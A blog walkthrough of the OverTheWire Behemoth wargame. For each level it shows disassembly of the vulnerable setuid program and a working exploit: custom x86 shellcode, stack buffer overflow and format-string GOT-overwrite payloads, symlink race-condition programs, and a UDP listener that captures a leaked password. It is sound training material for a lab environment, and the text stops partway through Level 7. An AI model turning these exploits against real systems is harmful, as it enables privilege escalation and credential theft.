Over the Wire: Behemoth
Written by Paco Pascal, on 17 May 2022.
Tags:
#hacking
Table of Contents
About this Document
This document is a light-weight walk-through for solving the wargame named Behemoth which is provided by "Over The Wire". It consists of elementary security vulnerabilities on the 32 bit x86 platform. You can find the wargame here.
Each level consists of one vulnerable program, that can be exploited to escalate privileges and capture the password for the next level.
The format of this document is to present the vulnerability followed by one possible exploit. No attempt is made to explain generic knowledge such as C, GDB, or how the exploits work.
All passwords are omitted.
Code & Conventions Used Throughout
The working directories throughout the outline are generated by cd
$(mktemp -d). However, everything is presented in a relative manner.
All passwords are kept in /etc/behemoth_pass/.
Two pieces of code will be reused across levels. One being shellcode
and the other being getenvaddr.
Shellcode
Because we only care about getting the passwords by reading a file
located in /etc/behemoth_pass/, we don't care about spawning a shell
(unless we're forced to for some reason). Therefore, our shellcode
executes /bin/cat to print the contents of
/etc/behemoth_pass/behemothX to standard out. The X at the end of
the path is replaced by the appropriate level, which makes this
shellcode easily reusable for any level that calls for it.
shellcode.asm
1: BITS 32 2: 3: xor eax, eax ; Our null byte 4: push eax 5: 6: mov edx, esp ; Save the address of our null byte 7: push "/cat" 8: push "/bin" ; Pushes "/bin/cat\0" on the stack 9: mov ebx, esp ; Keep the address of "/bin/cat\0" 10: 11: push eax ; push "\0" 12: push "othX" ; Change the X to the correct level number 13: push "ehem" 14: push "///b" 15: push "pass" 16: push "oth_" 17: push "ehem" 18: push "///b" 19: push "/etc" ; Creates "/etc///behemoth_pass///behemothX\0" 20: mov ebp, esp ; Save 21: 22: push eax ; NULL 23: push ebp ; Pointer to "/etc///behemoth_pass///behemothX\0" 24: push ebx ; Pointer to "/bin/cat\0" 25: mov ecx, esp ; Pointer to array of strings that's terminated with NULL 26: 27: mov al, 11 ; execve("/bin/cat", (char*[]) {"/bin/cat", "/etc///behemoth_pass///behemothX", NULL}, (char*[]) {NULL}); 28: int 0x80
Compiling
Edit line 12 by replacing X with the correct level number. Then use
NASM to assemble the shellcode.
1: $ nasm -o shellcode -f bin shellcode.asm
Environment Variables
The environment variable EGG will be used to store shellcode. In
order to get the address of our environment variable, we'll use
getenvaddr.c. This code is taken from Jon Erikson's book "Hacking:
The Art of Exploitation".
getenvaddr.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char** argv)
{
const char* ptr = getenv(argv[1]);
ptr += (strlen(argv[0]) - strlen(argv[2]))*2;
printf("%x\n", ptr);
return 0;
}
Compiling
To compile this, do the following:
1: $ gcc -m32 -o getenvaddr getenvaddr.c
Level 0
The Vulnerability
When the program is ran, the user is prompted for a password. The user given password is checked against a hard-coded string. This string is the password that causes the program to continue it's normal execution and spawns a shell. Line 48 is where a shell owned by behemoth1 would be spawned if the correct password is given.
Line 33 is where the string comparison happens between the given
password and the correct password. You can see our input string is
stored in $ebp-0x5d and the correct password is stored in
$ebp-1c. However, it is "encrypted". The function for encrypting and
decrypting the password is memfrob.
1: 080485b1 <main>: 2: 80485b1: 55 push ebp 3: 80485b2: 89 e5 mov ebp,esp 4: 80485b4: 53 push ebx 5: 80485b5: 83 ec 5c sub esp,0x5c 6: 80485b8: c7 45 e4 4f 4b 5e 47 mov DWORD PTR [ebp-0x1c],0x475e4b4f 7: 80485bf: c7 45 e8 53 59 42 45 mov DWORD PTR [ebp-0x18],0x45425953 8: 80485c6: c7 45 ec 58 5e 59 00 mov DWORD PTR [ebp-0x14],0x595e58 9: 80485cd: c7 45 f8 00 87 04 08 mov DWORD PTR [ebp-0x8],0x8048700 10: 80485d4: c7 45 f4 18 87 04 08 mov DWORD PTR [ebp-0xc],0x8048718 11: 80485db: c7 45 f0 2d 87 04 08 mov DWORD PTR [ebp-0x10],0x804872d 12: 80485e2: 68 41 87 04 08 push 0x8048741 13: 80485e7: e8 14 fe ff ff call 8048400 <printf@plt> 14: 80485ec: 83 c4 04 add esp,0x4 15: 80485ef: 8d 45 a3 lea eax,[ebp-0x5d] 16: 80485f2: 50 push eax 17: 80485f3: 68 4c 87 04 08 push 0x804874c 18: 80485f8: e8 73 fe ff ff call 8048470 <__isoc99_scanf@plt> 19: 80485fd: 83 c4 08 add esp,0x8 20: 8048600: 8d 45 e4 lea eax,[ebp-0x1c] 21: 8048603: 50 push eax 22: 8048604: e8 47 fe ff ff call 8048450 <strlen@plt> 23: 8048609: 83 c4 04 add esp,0x4 24: 804860c: 50 push eax 25: 804860d: 8d 45 e4 lea eax,[ebp-0x1c] 26: 8048610: 50 push eax 27: 8048611: e8 75 ff ff ff call 804858b <memfrob> 28: 8048616: 83 c4 08 add esp,0x8 29: 8048619: 8d 45 e4 lea eax,[ebp-0x1c] 30: 804861c: 50 push eax 31: 804861d: 8d 45 a3 lea eax,[ebp-0x5d] 32: 8048620: 50 push eax 33: 8048621: e8 ca fd ff ff call 80483f0 <strcmp@plt> 34: 8048626: 83 c4 08 add esp,0x8 35: 8048629: 85 c0 test eax,eax 36: 804862b: 75 32 jne 804865f <main+0xae> 37: 804862d: 68 51 87 04 08 push 0x8048751 38: 8048632: e8 e9 fd ff ff call 8048420 <puts@plt> 39: 8048637: 83 c4 04 add esp,0x4 40: 804863a: e8 d1 fd ff ff call 8048410 <geteuid@plt> 41: 804863f: 89 c3 mov ebx,eax 42: 8048641: e8 ca fd ff ff call 8048410 <geteuid@plt> 43: 8048646: 53 push ebx 44: 8048647: 50 push eax 45: 8048648: e8 f3 fd ff ff call 8048440 <setreuid@plt> 46: 804864d: 83 c4 08 add esp,0x8 47: 8048650: 68 62 87 04 08 push 0x8048762 48: 8048655: e8 d6 fd ff ff call 8048430 <system@plt> 49: 804865a: 83 c4 04 add esp,0x4 50: 804865d: eb 0d jmp 804866c <main+0xbb> 51: 804865f: 68 6a 87 04 08 push 0x804876a 52: 8048664: e8 b7 fd ff ff call 8048420 <puts@plt> 53: 8048669: 83 c4 04 add esp,0x4 54: 804866c: b8 00 00 00 00 mov eax,0x0 55: 8048671: 8b 5d fc mov ebx,DWORD PTR [ebp-0x4] 56: 8048674: c9 leave 57: 8048675: c3 ret
The Exploit
We can open up a debugger and either set a breakpoint at strcmp and
look at the decrypted string or we can call memfrob on the string
and look at it. We'll do the latter because it's a little more
educational.
There's some initializing on $ebp-0x1c happening at the beginning of
main. (You can see this above on lines 6 through 11.) Because of
this, we'll set the breakpoint at printf and then do our work. Let's
check the length of $ebp-0x1c and call memfrob.
1: $ gdb -q /behemoth/behemoth0 2: Reading symbols from /behemoth/behemoth0...(no debugging symbols found)...done. 3: (gdb) b printf 4: Breakpoint 1 at 0x8048400 5: (gdb) r 6: Starting program: /behemoth/behemoth0 7: 8: Breakpoint 1, 0xf7e5b7d0 in printf () from /lib32/libc.so.6
At this point, the the password string is initialized at $ebp-0x1c
but it's encrypted. We can see the encrypted string by doing,
1: (gdb) x/s $ebp-0x1c 2: 0xffffd6ac: "OK^GSYBEX^Y"
Now let's decrypted it by calling memfrob. If you look at what's
happening, you'll see that memfrob takes 2 arguments; the first
being a pointer to a string and the second being the length of the
string. Therefore, in order to call memfrob, we need the length of
$ebp-0x1c. We can get this by calling strlen.
1: (gdb) call strlen($ebp-0x1c) 2: $1 = 11 3: (gdb) call memfrob($ebp-0x1c, 11) 4: $2 = 0 5: (gdb) x/s $ebp-0x1c 6: 0xffffd6ac: "eatmyshorts" 7: (gdb) quit 8: A debugging session is active. 9: 10: Inferior 1 [process 16747] will be killed. 11: 12: Quit anyway? (y or n) y
Now that we have what we think is the password, we can test it.
1: $ /behemoth/behemoth0 2: Password: eatmyshorts 3: Access granted.. 4: $ whoami 5: behemoth1 6: $
Now we have the correct privileges to read
/etc/behemoth_pass/behemoth1.
Level 1
The Vulnerability
A classic buffer overflow on the stack.
User input is being written to a buffer on the stack with gets that
is 0x43 (67) bytes long. Therefore, this is vulnerable to over writing
the return address of main.
1: 0804844b <main>: 2: 804844b: 55 push ebp 3: 804844c: 89 e5 mov ebp,esp 4: 804844e: 83 ec 44 sub esp,0x44 5: 8048451: 68 00 85 04 08 push 0x8048500 6: 8048456: e8 a5 fe ff ff call 8048300 <printf@plt> 7: 804845b: 83 c4 04 add esp,0x4 8: 804845e: 8d 45 bd lea eax,[ebp-0x43] 9: 8048461: 50 push eax 10: 8048462: e8 a9 fe ff ff call 8048310 <gets@plt> 11: 8048467: 83 c4 04 add esp,0x4 12: 804846a: 68 0c 85 04 08 push 0x804850c 13: 804846f: e8 ac fe ff ff call 8048320 <puts@plt> 14: 8048474: 83 c4 04 add esp,0x4 15: 8048477: b8 00 00 00 00 mov eax,0x0 16: 804847c: c9 leave 17: 804847d: c3 ret
The Exploit
We'll put our shellcode in $EGG and overwrite the return address from
main to point to $EGG.
1: $ export EGG=$(cat shellcode) 2: $ ./getenvaddr EGG /behemoth/behemoth1 3: ffffda2d
Because the x86 architecture is little endian, we have to put the bytes in the correct order. The low-order byte goes first and the high-order byte last.
1: $ printf "%s\x2d\xda\xff\xff" $(python -c "print('A' * 71)") | /behemoth/behemoth1 2: Password: Authentication failure. 3: Sorry. 4: XXXXXXXXXX 5: $
The shellcode displays the contents of
/etc/behemoth_pass/behemoth2, which I have censored here.
Level 2
The Vulnerability
This awkward program has a vulnerable race condition. It tries to create a file who's filename is the PID of the process creating it. Then the program sleeps for 33.3 minutes. When it wakes up, it prints out the contents of the file it created.
Therefore, if we can replace the created file with a symbolic link
that points to /etc/behemoth_pass/behemoth3, then we can possibly
captured the password.
1: 0804856b <main>: 2: 804856b: 8d 4c 24 04 lea ecx,[esp+0x4] 3: 804856f: 83 e4 f0 and esp,0xfffffff0 4: 8048572: ff 71 fc push DWORD PTR [ecx-0x4] 5: 8048575: 55 push ebp 6: 8048576: 89 e5 mov ebp,esp 7: 8048578: 53 push ebx 8: 8048579: 51 push ecx 9: 804857a: 83 c4 80 add esp,0xffffff80 10: 804857d: e8 7e fe ff ff call 8048400 <getpid@plt> 11: 8048582: 89 45 f4 mov DWORD PTR [ebp-0xc],eax 12: 8048585: 8d 45 dc lea eax,[ebp-0x24] 13: 8048588: 83 c0 06 add eax,0x6 14: 804858b: 89 45 f0 mov DWORD PTR [ebp-0x10],eax 15: 804858e: 83 ec 04 sub esp,0x4 16: 8048591: ff 75 f4 push DWORD PTR [ebp-0xc] 17: 8048594: 68 10 87 04 08 push 0x8048710 18: 8048599: 8d 45 dc lea eax,[ebp-0x24] 19: 804859c: 50 push eax 20: 804859d: e8 9e fe ff ff call 8048440 <sprintf@plt> 21: 80485a2: 83 c4 10 add esp,0x10 22: 80485a5: 83 ec 08 sub esp,0x8 23: 80485a8: 8d 85 78 ff ff ff lea eax,[ebp-0x88] 24: 80485ae: 50 push eax 25: 80485af: ff 75 f0 push DWORD PTR [ebp-0x10] 26: 80485b2: e8 19 01 00 00 call 80486d0 <__lstat> 27: 80485b7: 83 c4 10 add esp,0x10 28: 80485ba: 25 00 f0 00 00 and eax,0xf000 29: 80485bf: 3d 00 80 00 00 cmp eax,0x8000 30: 80485c4: 74 36 je 80485fc <main+0x91> 31: 80485c6: 83 ec 0c sub esp,0xc 32: 80485c9: ff 75 f0 push DWORD PTR [ebp-0x10] 33: 80485cc: e8 1f fe ff ff call 80483f0 <unlink@plt> 34: 80485d1: 83 c4 10 add esp,0x10 35: 80485d4: e8 07 fe ff ff call 80483e0 <geteuid@plt> 36: 80485d9: 89 c3 mov ebx,eax 37: 80485db: e8 00 fe ff ff call 80483e0 <geteuid@plt> 38: 80485e0: 83 ec 08 sub esp,0x8 39: 80485e3: 53 push ebx 40: 80485e4: 50 push eax 41: 80485e5: e8 36 fe ff ff call 8048420 <setreuid@plt> 42: 80485ea: 83 c4 10 add esp,0x10 43: 80485ed: 83 ec 0c sub esp,0xc 44: 80485f0: 8d 45 dc lea eax,[ebp-0x24] 45: 80485f3: 50 push eax 46: 80485f4: e8 17 fe ff ff call 8048410 <system@plt> 47: 80485f9: 83 c4 10 add esp,0x10 48: 80485fc: 83 ec 0c sub esp,0xc 49: 80485ff: 68 d0 07 00 00 push 0x7d0 50: 8048604: e8 c7 fd ff ff call 80483d0 <sleep@plt> 51: 8048609: 83 c4 10 add esp,0x10 52: 804860c: 8d 45 dc lea eax,[ebp-0x24] 53: 804860f: c7 00 63 61 74 20 mov DWORD PTR [eax],0x20746163 54: 8048615: c6 40 04 00 mov BYTE PTR [eax+0x4],0x0 55: 8048619: c6 45 e0 20 mov BYTE PTR [ebp-0x20],0x20 56: 804861d: e8 be fd ff ff call 80483e0 <geteuid@plt> 57: 8048622: 89 c3 mov ebx,eax 58: 8048624: e8 b7 fd ff ff call 80483e0 <geteuid@plt> 59: 8048629: 83 ec 08 sub esp,0x8 60: 804862c: 53 push ebx 61: 804862d: 50 push eax 62: 804862e: e8 ed fd ff ff call 8048420 <setreuid@plt> 63: 8048633: 83 c4 10 add esp,0x10 64: 8048636: 83 ec 0c sub esp,0xc 65: 8048639: 8d 45 dc lea eax,[ebp-0x24] 66: 804863c: 50 push eax 67: 804863d: e8 ce fd ff ff call 8048410 <system@plt> 68: 8048642: 83 c4 10 add esp,0x10 69: 8048645: b8 00 00 00 00 mov eax,0x0 70: 804864a: 8d 65 f8 lea esp,[ebp-0x8] 71: 804864d: 59 pop ecx 72: 804864e: 5b pop ebx 73: 804864f: 5d pop ebp 74: 8048650: 8d 61 fc lea esp,[ecx-0x4] 75: 8048653: c3 ret
The Exploit
Because the process is running as behemoth3, we need to ensure the
process has permission to write to the directories and files we
need. To accomplish this, we'll make a new directory and give it 777
permissions. Then we'll make a file called pass.txt and give it the
same permissions.
1: $ mkdir w 2: $ chmod 777 3: $ cd w 4: $ touch pass.txt 5: $ chmod 777 pass.txt
This hack will take 33.3 minutes to complete. Because we don't want to
sit here watching for a password to pop up, we'll run the process in
the background and pipe the output to pass.txt. After we start the
process, we'll know the PID and hence know the filename we need to
overwrite with a symbolic link.
1: $ behemoth/behemoth2 > pass.txt & 2: [1] 29355 3: $ ln -sf /etc/behemoth_pass/behemoth3 29355
We can run the following shell script snippet to sound the bell when the process has ended.
1: $ while (2>&1 kill -0 29355 | grep permitted > /dev/null); do 2: > echo "Process still running..." 3: > sleep 5 4: > done; \ 5: > echo -ne '\007'; \ # Ring the bell 6: > cat pass.txt
Level 3
The Vulnerability
This level has a format string vulnerability. The user is prompted for
input and that input is passed directly to printf. Therefore, a user
can inject formatting syntax that printf understands.
This can be used to overwrite parts of memory using the %n
specifier; which implies we can overwrite a return address, parts of
the .plt section or something else we choose.
Looking at the disassembly of main, we see puts is called at
address 0x80484cc.
1: 0804847b <main>: 2: 804847b: 55 push ebp 3: 804847c: 89 e5 mov ebp,esp 4: 804847e: 81 ec c8 00 00 00 sub esp,0xc8 5: 8048484: 68 60 85 04 08 push 0x8048560 6: 8048489: e8 a2 fe ff ff call 8048330 <printf@plt> 7: 804848e: 83 c4 04 add esp,0x4 8: 8048491: a1 c0 97 04 08 mov eax,ds:0x80497c0 9: 8048496: 50 push eax 10: 8048497: 68 c8 00 00 00 push 0xc8 11: 804849c: 8d 85 38 ff ff ff lea eax,[ebp-0xc8] 12: 80484a2: 50 push eax 13: 80484a3: e8 98 fe ff ff call 8048340 <fgets@plt> 14: 80484a8: 83 c4 0c add esp,0xc 15: 80484ab: 68 74 85 04 08 push 0x8048574 16: 80484b0: e8 7b fe ff ff call 8048330 <printf@plt> 17: 80484b5: 83 c4 04 add esp,0x4 18: 80484b8: 8d 85 38 ff ff ff lea eax,[ebp-0xc8] 19: 80484be: 50 push eax 20: 80484bf: e8 6c fe ff ff call 8048330 <printf@plt> 21: 80484c4: 83 c4 04 add esp,0x4 22: 80484c7: 68 7e 85 04 08 push 0x804857e 23: 80484cc: e8 7f fe ff ff call 8048350 <puts@plt> 24: 80484d1: 83 c4 04 add esp,0x4 25: 80484d4: b8 00 00 00 00 mov eax,0x0 26: 80484d9: c9 leave 27: 80484da: c3 ret
Because the program is calling puts from a dynamically loaded
library, it needs to know how to find the address where puts
resides. This information is supplied by the .plt section.
1: 08048350 <puts@plt>: 2: 8048350: ff 25 ac 97 04 08 jmp DWORD PTR ds:0x80497ac 3: 8048356: 68 10 00 00 00 push 0x10 4: 804835b: e9 c0 ff ff ff jmp 8048320 <.plt>
We can see from the above disassembly that the pointer to puts is
0x80497ac.
The Exploit
Let's first prepare our shellcode.
1: $ export EGG=$(cat shellcode) 2: $ ./getenvaddr EGG /behemoth/behemoth3 3: ffffde2d
From the .plt section, we know the pointer for puts is
0x80497ac. We'll overwrite the value in two steps. First overwriting
2 bytes at 0x80497ac. Then overwriting 2 bytes at 0x80497ae. The
order matters. The %n specifier writes 4 bytes (an unsigned int) and
we don't want to overwrite the upper 2 bytes of our address when
writing the lower two bytes.
Our string for printf will conceptually consist of two parts. The
first is "\xac\x97\x04\x08\xae\x97\x04\x08" which will act as
pointers for %n. The second part will have this structure
"%c%1$n%c%2$n". We just have to figure out how many chars to print
so that %n will write the correct value.
If we use the strings above as they are, the lower 2 bytes would be written with 0x09 and the upper 2 bytes would be 0x0a. We need the lower 2 bytes to be 0xde2d. Therefore, we need to write 56869 (0xde25) more characters and then 8658 (0x21d2) more characters for the last 2 bytes.
The final result looks like this:
1: $ printf '\xac\x97\x04\x08\xae\x97\x04\x08%%56869c%%1$n%%8658c%%2$n' | /behemoth/behemoth3 2: 3: XXXXXXXXXX
Level 4
The Vulnerability
This level is very similar to level 2. The program is trying to open a
file that's named after it's PID. Then it prints out the file
contents. We can see in the beginning of main, getpid is called
(at 0x804858c) and the result is stored in $ebp-0xc. Soon after, the
value is used in sprintf to create some new string. You can quickly
see that the format string for sprintf is "/tmp/%d".
1: 0804857b <main>: 2: 804857b: 8d 4c 24 04 lea ecx,[esp+0x4] 3: 804857f: 83 e4 f0 and esp,0xfffffff0 4: 8048582: ff 71 fc push DWORD PTR [ecx-0x4] 5: 8048585: 55 push ebp 6: 8048586: 89 e5 mov ebp,esp 7: 8048588: 51 push ecx 8: 8048589: 83 ec 24 sub esp,0x24 9: 804858c: e8 6f fe ff ff call 8048400 <getpid@plt> 10: 8048591: 89 45 f4 mov DWORD PTR [ebp-0xc],eax 11: 8048594: 83 ec 04 sub esp,0x4 12: 8048597: ff 75 f4 push DWORD PTR [ebp-0xc] 13: 804859a: 68 c0 86 04 08 push 0x80486c0 14: 804859f: 8d 45 d8 lea eax,[ebp-0x28] 15: 80485a2: 50 push eax 16: 80485a3: e8 b8 fe ff ff call 8048460 <sprintf@plt> 17: 80485a8: 83 c4 10 add esp,0x10 18: 80485ab: 83 ec 08 sub esp,0x8 19: 80485ae: 68 c8 86 04 08 push 0x80486c8 20: 80485b3: 8d 45 d8 lea eax,[ebp-0x28] 21: 80485b6: 50 push eax 22: 80485b7: e8 74 fe ff ff call 8048430 <fopen@plt>
Then there's some yada-yada (that's a technical term) and the content is read and spit out.
1: 80485bc: 83 c4 10 add esp,0x10 2: 80485bf: 89 45 f0 mov DWORD PTR [ebp-0x10],eax 3: 80485c2: 83 7d f0 00 cmp DWORD PTR [ebp-0x10],0x0 4: 80485c6: 75 12 jne 80485da <main+0x5f> 5: 80485c8: 83 ec 0c sub esp,0xc 6: 80485cb: 68 ca 86 04 08 push 0x80486ca 7: 80485d0: e8 3b fe ff ff call 8048410 <puts@plt> 8: 80485d5: 83 c4 10 add esp,0x10 9: 80485d8: eb 52 jmp 804862c <main+0xb1> 10: 80485da: 83 ec 0c sub esp,0xc 11: 80485dd: 6a 01 push 0x1 12: 80485df: e8 0c fe ff ff call 80483f0 <sleep@plt> 13: 80485e4: 83 c4 10 add esp,0x10 14: 80485e7: 83 ec 0c sub esp,0xc 15: 80485ea: 68 d9 86 04 08 push 0x80486d9 16: 80485ef: e8 1c fe ff ff call 8048410 <puts@plt> 17: 80485f4: 83 c4 10 add esp,0x10 18: 80485f7: eb 0e jmp 8048607 <main+0x8c> 19: 80485f9: 83 ec 0c sub esp,0xc 20: 80485fc: ff 75 ec push DWORD PTR [ebp-0x14] 21: 80485ff: e8 3c fe ff ff call 8048440 <putchar@plt> 22: 8048604: 83 c4 10 add esp,0x10 23: 8048607: 83 ec 0c sub esp,0xc 24: 804860a: ff 75 f0 push DWORD PTR [ebp-0x10] 25: 804860d: e8 3e fe ff ff call 8048450 <fgetc@plt> 26: 8048612: 83 c4 10 add esp,0x10 27: 8048615: 89 45 ec mov DWORD PTR [ebp-0x14],eax 28: 8048618: 83 7d ec ff cmp DWORD PTR [ebp-0x14],0xffffffff 29: 804861c: 75 db jne 80485f9 <main+0x7e> 30: 804861e: 83 ec 0c sub esp,0xc 31: 8048621: ff 75 f0 push DWORD PTR [ebp-0x10] 32: 8048624: e8 b7 fd ff ff call 80483e0 <fclose@plt> 33: 8048629: 83 c4 10 add esp,0x10 34: 804862c: b8 00 00 00 00 mov eax,0x0 35: 8048631: 8b 4d fc mov ecx,DWORD PTR [ebp-0x4] 36: 8048634: c9 leave 37: 8048635: 8d 61 fc lea esp,[ecx-0x4] 38: 8048638: c3 ret
Thus, if we know the PID we can create a symbolic link in /tmp/ that
points to /etc/behemoth_pass/behemoth5.
The Exploit
The exploit is fairly straight forward. We'll implement a wrapper that
forks to capture the PID. The parent process will create the symlink
and the child will execute /behemoth/behemoth4.
#include <stdio.h>
#include <unistd.h>
int main() {
int pid = fork();
char file[] = "/tmp/XXXXXXXXXXXXXXXX";
if (pid == 0) {
printf("Child is sleeping...\n");
sleep(5);
printf("Child woke up!\n");
printf("Executing behemoth4");
execl("/behemoth/behemoth4", "behemoth4", NULL);
} else {
sprintf(file + sizeof("/tmp/") - 1, "%d", pid);
printf("Making symlink: %s -> /etc/behemoth_pass/behemoth5\n", file);
symlink("/etc/behemoth_pass/behemoth5", file);
}
return 0;
}
We'll save this code exploit.c and compile it.
1: $ gcc -o exploit exploit.c 2: $ ./exploit > pass.txt
Wait for 5 seconds and then,
1: $ cat pass.txt 2: Making symlink: /tmp/16830 -> /etc/behemoth_pass/behemoth5 3: Finished sleeping, fgetcing 4: XXXXXXXXXX
Level 5
The Vulnerability
I'm not going to post the entire disassembly because it's long and we don't need to reference most of it.
Immediately, the program is opening a file which happens to be the
password file we want to read, /etc/behemoth_pass/behemoth6. The
strings 0x80489a0 and 0x80489a2 are "r" and
/etc/behemoth_pass/behemoth6 respectively.
1: 0804872b <main>: 2: 804872b: 8d 4c 24 04 lea ecx,[esp+0x4] 3: 804872f: 83 e4 f0 and esp,0xfffffff0 4: 8048732: ff 71 fc push DWORD PTR [ecx-0x4] 5: 8048735: 55 push ebp 6: 8048736: 89 e5 mov ebp,esp 7: 8048738: 51 push ecx 8: 8048739: 83 ec 34 sub esp,0x34 9: 804873c: c7 45 f4 00 00 00 00 mov DWORD PTR [ebp-0xc],0x0 10: 8048743: 83 ec 08 sub esp,0x8 11: 8048746: 68 a0 89 04 08 push 0x80489a0 12: 804874b: 68 a2 89 04 08 push 0x80489a2 13: 8048750: e8 5b fe ff ff call 80485b0 <fopen@plt>
So the question is, what is the program going to do with the file? The answer is read the contents and write those contents to a socket. Therefore, we need to know the socket type (such as TCP, UDP, or UNIX). In addition to this we need to know either the port or filename of the socket.
We can see that it's a connection-less socket over IP. The 0x2 at
0x8048834 refers to SOCK_DGRAM and the 0x2 at 0x8048836 refers to
PF_INET. Therefore, it's a UDP socket.
1: 8048832: 6a 00 push 0x0 2: 8048834: 6a 02 push 0x2 3: 8048836: 6a 02 push 0x2 4: 8048838: e8 b3 fd ff ff call 80485f0 <socket@plt>
The port number can be found here which ends up being 1337.
1: 804886c: 68 e4 89 04 08 push 0x80489e4 2: 8048871: e8 6a fd ff ff call 80485e0 <atoi@plt>
The Exploit
This will be extremely easy. We'll use netcat to listen on a UDP socket using port 1337.
1: $ nc -u -l -p 1337 > pass.txt & 2: [2] 18669 3: $ /behemoth/behemoth5 4: $ cat pass.txt 5: XXXXXXXXXX
Level 6
The Vulnerability
Level 6 consists of two executables, /behemoth/behemoth6 and
/behemoth/behemoth6_reader. The former executes behemoth6_reader
with popen and reads it's output. If the output matches
"HelloKitty", it spawns a shell owned behemoth7.
Therefore, to solve this level, we need to force behemoth6_reader to
print out "HelloKitty". If we look at what behemoth6_reader does, it
reads the contents of a filename "shellcode.txt" into memory and then
calls it as a function. However, if "shellcode.txt" has a 0xb byte, it
fails.
There are so many ways this can be exploited.
The Exploit
One solution is to write some shellcode that prints out "HelloKitty". The following shellcode accomplishes this:
1: BITS 32 2: %define PUTS [0x804a020] 3: push ebp 4: mov ebp,esp 5: xor eax, eax 6: push eax 7: push "itty" 8: push "lloK" 9: push "xxHe" 10: inc esp 11: inc esp 12: push esp 13: call PUTS 14: mov esp, ebp 15: pop ebp 16: ret
We need to make a directory that the user behemoth7 can access.
1: $ mkdir w 2: $ chmod 777 w 3: $ cd w
Now let's assemble our shellcode and run behemoth6.
1: $ nasm -o shellcode.txt ../shellcode6.asm 2: $ /behemoth/behemoth6 3: Correct. 4: $ whoami 5: behemoth7 6: $ cat /etc/behemoth_pass/behemoth7 7: XXXXXXXXXX 8: $
Alternative Exploit
Just to make the point that there's more than one solution to these levels, I'll provide another method. The shellcode is running as behemoth7. Therefore we can directly access files owned by behemoth7 from the shellcode.
Instead of having our shellcode print out "HelloKitty", we can just
copy the contents of /etc/behemoth_pass/behemoth7 to a file
behemoth6 can read.
Here's shellcode that avoids the byte 0xb and executes a file named
X in the local directory.
1: BITS 32 2: 3: xor eax, eax ; Our null byte 4: push eax 5: mov ecx, esp ; Array of {NULL} 6: mov edx, esp ; Array of {NULL} 7: push ".//X" 8: mov ebx, esp 9: inc al 10: add al, 10 ; Avoid 0xb 11: int 0x80
Let's write a C program called X.c that will copy the password out
of /etc/behemoth_pass/behemoth7 and into pass.txt.
#include <stdio.h>
int main(int argc, char** argv)
{
const char* file = "/etc/behemoth_pass/behemoth7";
FILE* out = fopen("pass.txt", "w");
if (!out)
return -1;
FILE* in = fopen(file, "r");
if (!in) {
fprintf(out, "Failed to open %s", file);
fclose(out);
return -1;
}
int c;
while ((c = fgetc(in)) != EOF)
fprintf(out, "%c", c);
fclose(out);
fclose(in);
return 0;
}
Now we'll assemble, compile, and run.
1: $ mkdir w 2: $ chmod 777 w 3: $ cd w 4: $ touch pass.txt 5: $ chmod 777 pass.txt 6: $ nasm -o shellcode.txt -f bin shellcode6.1.asm 7: $ gcc -m32 -o X X.c 8: $ /behemoth/behemoth6 9: Incorrect output. 10: $ cat pass.txt 11: XXXXXXXXXX
Level 7
The Vulnerability
This level uses the vulnerable strcpy function. But it tries to
protect against us running shellcode by zeroing the memory that holds
all the environment variables. It also checks argv[1] for
non-alphanumeric characters. If such characters are found, the process
exits before reaching strcpy.
Notice I said argv[1] is checked. It never checks argv[2] and
beyond. Therefore, we can inject our shellcode there. The buffer size
that argv[1] is copied into is 524 bytes.
1: 0804852b <main>: 2: 804852b: 55 push ebp 3: 804852c: 89 e5 mov ebp,esp 4: 804852e: 81 ec 0c 02 00 00 sub esp,0x20c 5: 8048534: 8b 45 0c mov eax,DWORD PTR [ebp+0xc] 6: 8048537: 8b 40 04 mov eax,DWORD PTR [eax+0x4] 7: 804853a: 89 45 fc mov DWORD PTR [ebp-0x4],eax 8: 804853d: c7 45 f8 00 00 00 00 mov DWORD PTR [ebp-0x8],0x0 9: 8048544: eb 3d jmp 8048583 <main+0x58> 10: 8048546: 8b 45 f8 mov eax,DWORD PTR [ebp-0x8] 11: 8048549: 8d 14 85 00 00 00 00 lea edx,[eax*4+0x0] 12: 8048550: 8b 45 10 mov eax,DWORD PTR [ebp+0x10] 13: 8048553: 01 d0 add eax,edx 14: 8048555: 8b 00 mov eax,DWORD PTR [eax] 15: 8048557: 50 push eax 16: 8048558: e8 73 fe ff ff call 80483d0 <strlen@plt> 17: 804855d: 83 c4 04 add esp,0x4 18: 8048560: 89 c2 mov edx,eax 19: 8048562: 8b 45 f8 mov eax,DWORD PTR [ebp-0x8] 20: 8048565: 8d 0c 85 00 00 00 00 lea ecx,[eax*4+0x0] 21: 804856c: 8b 45 10 mov eax,DWORD PTR [ebp+0x10] 22: 804856f: 01 c8 add eax,ecx 23: 8048571: 8b 00 mov eax,DWORD PTR [eax] 24: 8048573: 52 push edx 25: 8048574: 6a 00 push 0x0 26: 8048576: 50 push eax 27: 8048577: e8 84 fe ff ff call 8048400 <memset@plt> 28: 804857c: 83 c4 0c add esp,0xc 29: 804857f: 83 45 f8 01 add DWORD PTR [ebp-0x8],0x1 30: 8048583: 8b 45 f8 mov eax,DWORD PTR [ebp-0x8] 31: 8048586: 8d 14 85 00 00 00 00 lea edx,[eax*4+0x0] 32: 804858d: 8b 45 10 mov eax,DWORD PTR [ebp+0x10] 33: 8048590: 01 d0 add eax,edx 34: 8048592: 8b 00 mov eax,DWORD PTR [eax] 35: 8048594: 85 c0 test eax,eax 36: 8048596: 75 ae jne 8048546 <main+0x1b> 37: 8048598: c7 45 f4 00 00 00 00 mov DWORD PTR [ebp-0xc],0x0 38: 804859f: 83 7d 08 01 cmp DWORD PTR [ebp+0x8],0x1 39: 80485a3: 0f 8e 9a 00 00 00 jle 8048643 <main+0x118> 40: 80485a9: eb 6d jmp 8048618 <main+0xed> 41: 80485ab: 83 45 f4 01 add DWORD PTR [ebp-0xc],0x1 42: 80485af: e8 5c fe ff ff call 8048410 <__ctype_b_loc@plt> 43: 80485b4: 8b 10 mov edx,DWORD PTR [eax] 44: 80485b6: 8b 45 fc mov eax,DWORD PTR [ebp-0x4] 45: 80485b9: 0f b6 00 movzx eax,BYTE PTR [eax] 46: 80485bc: 0f be c0 movsx eax,al 47: 80485bf: 01 c0 add eax,eax 48: 80485c1: 01 d0 add eax,edx 49: 80485c3: 0f b7 00 movzx eax,WORD PTR [eax] 50: 80485c6: 0f b7 c0 movzx eax,ax 51: 80485c9: 25 00 04 00 00 and eax,0x400 52: 80485ce: 85 